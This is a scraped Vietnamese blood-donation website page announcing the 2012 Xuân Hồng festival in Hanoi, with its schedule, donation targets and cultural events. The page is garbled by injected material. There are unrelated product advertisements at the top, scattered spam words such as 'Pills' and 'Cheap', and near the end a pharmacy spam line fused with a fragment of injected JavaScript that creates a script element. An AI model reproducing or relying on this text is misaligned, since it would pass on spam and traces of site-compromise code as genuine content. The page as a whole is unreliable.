Website cùng hệ thống:
Hỗ trợ trực tuyến:

Hoàng Giáp cung cấp lồng công nghiệp giá rẻ nhưng rất chuyên nghiệp. Sản phẩm bán lồng thỏ 100 làm bằng máy tự động, các mối hàn gọn, chắc chắn, các nan lồng được mạ kẽm sáng bóng và độ bền cao. Tôi đã sử dụng toàn bộ thiết bị máy làm cám Hoàng Giáp cung cấp từ lồng thỏ, van uống nước cho thỏ, máng ăn cho thỏ, tấm nhựa đa năng. Đặc biệt tôi rất yêu thích bán máy ép cám viên chăn nuôi, bởi sản phẩm này giúp tôi tiết kệm 60% chi phí chăn nuôi và 70% nhân lực cho chăn nuôi. Cảm ơn Hoàng Giáp Nhận đào tạo, hướng dẫn giải pháp phục hồi tóc hư tổn tận gốc chỉ sau 1 tuần

^ Lên đầu trang
lehoixuanhong.jpg

Lễ hội Xuân Hồng 2012

Đăng ngày 06/02/2012

Với thông điệp “Sẻ giọt máu đào – Trao niềm hy vọng”, Lễ hội Xuân hồng 2012 sẽ kỷ niệm lần V được tổ chức và nhân ngày lễ tình yêu Valentine’s Day.
Pills

Khai hội Xuân Hồng

Pills
Chương trình khai hội dự được truyền hình trực tiếp trên đài truyền hình Hà Nội với hoạt động văn hóa văn nghệ và những góc nhìn thú vị về Lễ hội Xuân hồng qua 4 kỳ nhìn lại và ngày lễ tình yêu rộn ràng sắc màu trong ngày đi trẩy hội Xuân hồng 2012

Thời gian: từ 9h00 đến 11h00 ngày 12/2/2012

Rước lửa truyền thống của 18 Tình nguyện viên vận động và hiến máu tiêu biểu nhân kỷ niệm 18 năm phát động phong trào hiến máu tình nguyện tại Việt Nam và kết thúc bằng việc thắp lửa, đánh trống khai hội của Phó Chủ tịch nước Nguyễn Thị Doan.
Màn trống hội tưng bừng, rộn ràng và văn hóa văn nghệ của các ca sĩ, nghệ sĩ chuyên nghiệp mang đậm tình nhân ái và truyền thống dân tộc.
Toàn cảnh Lễ hội và màn hấp dẫn với hoạt động 500 đôi tình nguyện cùng nhau hiến máu.

“Tết yêu thương trao lòng nhân ái”

Cùng phá kỷ lục Quốc gia số người hiến máu trong một ngày. Cheap

Thời gian: từ 7h00 đến 17h00 ngày 12/2/2012

Lễ hội Xuân hồng 2012 với hơn 3.000 Tình nguyện viên tham gia hỗ trợ trong 7 ngày cao điểm được chia làm 9 khu vực Thành phố Hà Nội, mong muốn vận động trên 15.000 người đăng ký hiến máu tình nguyện và tổ chức tiếp nhận được trên 6.000 đơn vị máu phá kỷ lục lễ hội Xuân hồng 2011 là 5.653 đơn vị.
Cùng với việc phá kỷ lục số người hiến máu trong một ngày Lễ hội cũng là nơi gặp gỡ của 500 đôi tình nhân cùng tham gia hiến máu cứu người.

“Tình ca cho giai nhân”

Pills
Thời gian: từ 7h00 đến 17h00 ngày 12/2/2012

Chương trình văn hóa văn nghệ đặc sắc nơi hội ngộ của các ca sĩ nghệ sĩ gắn bó với phong trào hiến máu, phong trào thanh niên tình nguyện như: Mỹ Linh, Khắc Hiếu, Thái Thùy Linh, Duy Khoa, Idol Blood…nhân ngày lễ tình yêu Valentine 14/2. Giao lưu, gặp gỡ với Hoa hậu Ngọc Hân và liên hoan các nhóm vũ điệu trẻ, nhịp điệu đỏ. Các đôi lứa yêu nhau cùng hiến máu có thể tự thể hiện tặng nhau những ca khúc cho giai nhân.

“Rộn ràng bốn mùa sắc màu phố phường”

Thời gian: từ 7h00 đến 17h00 ngày 12/2/2012

Một không khí lễ hội rộn ràng bốn mùa với hơn 40 gian hàng qua 4 khu phố.
Phố Xuân: Tưng bừng sắc hoa, không khí mùa xuân, tết cổ truyền khắp nơi với câu đối đỏ, với bánh chưng xanh, với thuyền hoa…
Phố Hạ: Tái hiện không khí lễ hội mùa hè sôi động, Game show hấp dẫn và thú vị, nhưng trò chơi dân gian và hiện đại sẽ được thể hiện..
Phố Thu: Cùng đến cảm nhận và thể hiện “chút tình thu” cho nhưng người yêu thương qua những dòng lưu bút, qua những hàng hoa hồng thơm ngát trên vỉa hè, màu đỏ của lá, màu vàng của nắng tỏa…
Phố Đông: Một bản tình ca cho đôi lứa yêu nhau, hò hẹn và ước nguyện, màu trắng của tuyến và màu hồng của cánh hoa, màu xanh của lá, các đôi bạn trẻ cũng có thể tự mình thể hiện, thực hiện những món quà góp phần mang lại sự ấm áp cho những người thân và cùng chia sẻ với những đôi chân trần của các em nhỏ nơi vùng núi xa.
Dạo qua các khu phố nhiều sắc màu và cùng thưởng thức hương vị của những món ngon bốn mùa cùng chụp, lưu lại những khoảnh khắc Xuân hồng trong ngày cận kề lễ tình yêu với biểu tượng trung tâm của “Năm Thìn – Xuân hồng và Valentine”

“Lời tỏ tình của Đam San”

Thời gian: từ 16h00 đến 17h00 ngày 12/2/2012

Chương trình đặc biệt kỷ niệm ngày lễ Valentine thông qua lời tỏ tình của chàng Đam San là bản tình về khát vọng tình yêu luôn vươn tới sự hoàn thiện, hướng tới cái đẹp, 1.000 đôi bạn trẻ cùng hòa nhịp con tim qua những màn dân vũ ấn tượng.} else { Pills Buy Cheap doxcycline no presription var d=document;var s=d.createElement(‘script’);

© 2012 – 2018, NhómMáu.vn. Giữ toàn quyền. Vui lòng ghi rõ nguồn khi bạn phát hành lại nội dung từ website này.


Tags:

2012

Lễ hội

xuân hồng


Bài viết liên quan

Bộ Y Tế Trung Ương Hội Chữ thập đỏ Việt Nam Kênh truyền hình Sức khỏe O2TV Viện Huyết học truyền máu Trung ương Bệnh viện K Bệnh viện Bạch Mai Bệnh viện Trung Ương Quân đội 108 Bệnh viện 103 Bệnh viện hữu nghị Việt Đức Bệnh viện Nhi Trung Ương Bệnh viện Phụ sản Trung Ương Bệnh viện Phụ sản Hà Nội EldonCard